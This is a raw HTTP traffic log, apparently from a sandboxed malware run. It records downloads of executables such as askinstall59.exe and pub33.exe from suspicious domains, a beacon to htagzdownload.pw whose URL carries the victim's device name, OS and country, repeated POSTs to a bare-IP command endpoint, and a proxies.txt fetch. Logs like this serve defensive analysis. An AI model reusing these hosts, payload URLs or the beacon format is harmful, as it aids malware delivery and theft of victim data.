HEAD /askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Content-Length: 0 Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:46 GMT Content-Type: application/octet-stream Content-Length: 1519104 Last-Modified: Thu, 04 Nov 2021 06:13:06 GMT Connection: keep-alive ETag: "618379f2-172e00" Accept-Ranges: bytes

HEAD /askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Content-Length: 0 Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:46 GMT Content-Type: application/octet-stream Content-Length: 1519104 Last-Modified: Thu, 04 Nov 2021 06:13:06 GMT Connection: keep-alive ETag: "618379f2-172e00" Accept-Ranges: bytes

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:23 GMT Date: Fri, 05 Nov 2021 00:07:23 GMT Connection: keep-alive

HEAD /askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Content-Length: 0 Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.6.40

HEAD /askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Content-Length: 0 Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.6.40

GET /downloads/toolspab2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: privacytoolzfor-you6000.top Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT ETag: "55a00-5cfff6c24c825" Accept-Ranges: bytes Content-Length: 350720 Connection: close Content-Type: application/octet-stream

GET /pub33.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: eguntong.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 04 Nov 2021 23:44:02 GMT ETag: "55c00-5cfff19f5bd79" Accept-Ranges: bytes Content-Length: 351232 Connection: close Content-Type: application/x-msdos-program

GET /pub33.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: eguntong.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 04 Nov 2021 23:44:02 GMT ETag: "55c00-5cfff19f5bd79" Accept-Ranges: bytes Content-Length: 351232 Connection: close Content-Type: application/x-msdos-program

GET /askhelp59/askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:06:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.mrwenshen.com/askinstall59.exe

GET /askhelp59/askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:06:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.mrwenshen.com/askinstall59.exe

GET /downloads/toolspab2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: privacytoolzfor-you6000.top Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT ETag: "55a00-5cfff6c24c825" Accept-Ranges: bytes Content-Length: 350720 Connection: close Content-Type: application/octet-stream

GET /askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:47 GMT Content-Type: application/octet-stream Content-Length: 1519104 Last-Modified: Thu, 04 Nov 2021 06:13:06 GMT Connection: keep-alive ETag: "618379f2-172e00" Accept-Ranges: bytes

GET /askhelp42/askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.hzradiant.com/askinstall42.exe

GET /askhelp42/askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.hzradiant.com/askinstall42.exe

GET /askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:06:47 GMT Content-Type: application/octet-stream Content-Length: 1519104 Last-Modified: Thu, 04 Nov 2021 06:13:06 GMT Connection: keep-alive ETag: "618379f2-172e00" Accept-Ranges: bytes

GET /askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 517 Connection: keep-alive X-Powered-By: PHP/5.6.40

GET /askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 517 Connection: keep-alive X-Powered-By: PHP/5.6.40

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:24 GMT Date: Fri, 05 Nov 2021 00:07:24 GMT Connection: keep-alive

GET /search_hyperfs_204.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dataonestorage.com Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently Server: nginx/1.20.1 Date: Fri, 05 Nov 2021 00:07:26 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://dataonestorage.com/search_hyperfs_204.exe

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:26 GMT Date: Fri, 05 Nov 2021 00:07:26 GMT Connection: keep-alive

GET /search_hyperfs_204.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dataonestorage.com Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently Server: nginx/1.20.1 Date: Fri, 05 Nov 2021 00:07:27 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://dataonestorage.com/search_hyperfs_204.exe

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:27 GMT Date: Fri, 05 Nov 2021 00:07:27 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:27 GMT Date: Fri, 05 Nov 2021 00:07:27 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:30 GMT Date: Fri, 05 Nov 2021 00:07:30 GMT Connection: keep-alive

GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22BumperWw%22,%22ip%22:%22%22,%22country%22:%22KR%22,%22DateTime%22:%222021-11-05%2012:47%22,%22Device%22:%22TEST22-PC%22,%22PCName%22:%22test22%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lylaShare1_folderlyla1_foldershare_goodchannel_registry_goodchannel_installrox2_BumperWw%22,%22Os%22:%22WIN7%22,%22Browser%22:%22Internet%20explorer%22%7D HTTP/1.1 Host: htagzdownload.pw Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily Server: nginx Date: Fri, 05 Nov 2021 00:07:32 GMT Content-Type: text/html Connection: close Set-Cookie: btst=3b1eef88a8b88dff222ad3bd25da3c94|175.208.134.150|1636070852|1636070852|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Location: 1

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:31 GMT Date: Fri, 05 Nov 2021 00:07:31 GMT Connection: keep-alive

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:33 GMT Date: Fri, 05 Nov 2021 00:07:33 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:34 GMT Date: Fri, 05 Nov 2021 00:07:34 GMT Connection: keep-alive

GET /proxies.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.133.1.182

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:38 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 04 Nov 2021 12:33:30 GMT ETag: "9cf-5cff5bbedf3a3" Accept-Ranges: bytes Content-Length: 2511 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain

POST /service/communication.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:39 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 3 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /proxies.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.133.1.182

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:39 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 04 Nov 2021 12:33:30 GMT ETag: "9cf-5cff5bbedf3a3" Accept-Ranges: bytes Content-Length: 2511 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain

POST /service/communication.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:39 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 3 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /service/communication.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 73 Host: 212.192.241.15

POST /service/communication.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 73 Host: 212.192.241.15

GET /seemorebty/il.php?e=jg1_1faf HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 Referer: https://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 186.2.171.3

HTTP/1.1 200 OK Server: ddos-guard Connection: keep-alive Keep-Alive: timeout=60 Set-Cookie: __ddg1=oz7z6SPLbSnm54RJdfTe; Domain=.171.3; HttpOnly; Path=/; Expires=Sat, 05-Nov-2022 00:07:43 GMT Date: Fri, 05 Nov 2021 00:06:56 GMT Upgrade: h2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:43 GMT Date: Fri, 05 Nov 2021 00:07:43 GMT Connection: keep-alive